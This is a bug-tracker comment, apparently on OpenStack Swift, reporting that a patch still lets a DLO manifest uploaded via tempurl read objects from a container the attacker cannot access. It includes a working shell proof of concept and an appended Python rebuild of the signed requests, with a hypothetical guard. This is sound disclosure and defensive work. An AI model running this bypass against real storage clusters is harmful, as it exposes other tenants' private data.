Comment 61 for bug 1449212

Christian Schwede (cschwede) wrote :

Looks like the patch still allows abusing DLO + container tempurl, for example using the following simple script:

 # object the attacker is not allowed to read
 echo 12345 > foo.txt
 swift upload victim-container foo.txt

 # attacker sets a tempurl key on a container they control
 swift post -m "temp-url-key: secret" compromised-container

 # tempurl PUT of a zero-byte DLO manifest whose segment prefix points at the victim's container
 tempurl=$(swift-temp-url PUT 60 /v1/AUTH_test/compromised-container/foo.txt secret)
 curl -i -X PUT "http://127.0.0.1:8080${tempurl}" -H 'X-Object-Manifest: victim-container/f' -H 'Content-Length: 0'

 # tempurl GET of the manifest; the proxy concatenates victim-container/f* and returns the victim's data
 tempurl=$(swift-temp-url GET 60 /v1/AUTH_test/compromised-container/foo.txt secret)
 curl -i "http://127.0.0.1:8080${tempurl}"

Or did I get it wrong?
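The request pair above, rebuilt offline as an added example (this is not code from the bug report or from Swift). The signature is the HMAC-SHA1 over "METHOD\nEXPIRES\nPATH" that swift-temp-url computes, so the URLs it produces are the ones curl would be given; the final `manifest_escapes_signed_container` function is a hypothetical guard for illustrating what a proxy-side check would have to look at, not the upstream fix. The account, container and key names are taken from the comment.

```python
import hmac
from hashlib import sha1
from time import time

# Added example, not code from the bug report or from Swift itself.
# Names below are the ones used in the comment.
KEY = "secret"                          # temp-url-key set on compromised-container
ACCOUNT = "AUTH_test"
COMPROMISED = "compromised-container"   # attacker holds the tempurl key here
VICTIM = "victim-container"             # attacker has no read access here


def temp_url_sig(method, expires, path, key):
    """Signature swift-temp-url emits: HMAC-SHA1 over "METHOD\\nEXPIRES\\nPATH"."""
    msg = f"{method}\n{expires}\n{path}".encode()
    return hmac.new(key.encode(), msg, sha1).hexdigest()


def make_temp_url(method, seconds, path, key, now=None):
    """Equivalent of `swift-temp-url METHOD SECONDS PATH KEY` (returns the path
    plus query string, as the tool does; `now` is overridable for testing)."""
    expires = int((time() if now is None else now) + seconds)
    sig = temp_url_sig(method, expires, path, key)
    return f"{path}?temp_url_sig={sig}&temp_url_expires={expires}"


def attack_requests(now=None):
    """The PUT/GET pair from the comment: PUT a zero-byte DLO manifest into the
    attacker's container whose segment prefix points at the victim's container,
    then GET it through a tempurl so the proxy concatenates victim-container/f*."""
    obj = f"/v1/{ACCOUNT}/{COMPROMISED}/foo.txt"
    put = {
        "method": "PUT",
        "url": make_temp_url("PUT", 60, obj, KEY, now),
        "headers": {"X-Object-Manifest": f"{VICTIM}/f", "Content-Length": "0"},
    }
    get = {
        "method": "GET",
        "url": make_temp_url("GET", 60, obj, KEY, now),
        "headers": {},
    }
    return put, get


def manifest_escapes_signed_container(signed_path, headers):
    """Hypothetical server-side guard (not Swift's fix): a tempurl-authorised PUT
    may only carry an X-Object-Manifest whose segment container is the one the
    signature covers. signed_path is /v1/ACCOUNT/CONTAINER/OBJECT."""
    manifest = headers.get("X-Object-Manifest")
    if manifest is None:
        return False
    signed_container = signed_path.split("/", 4)[3]
    manifest_container = manifest.split("/", 1)[0]
    return manifest_container != signed_container


if __name__ == "__main__":
    put, get = attack_requests()
    for r in (put, get):
        print(r["method"], "http://127.0.0.1:8080" + r["url"], r["headers"])
    path = put["url"].split("?", 1)[0]
    print("manifest escapes signed container:",
          manifest_escapes_signed_container(path, put["headers"]))
```

The point the guard makes explicit: the tempurl signature authorises exactly one path, but the manifest header turns a later GET on that path into reads of objects the signature never covered, so the proxy has to compare the manifest's container against the signed one (or refuse X-Object-Manifest on tempurl PUTs altogether).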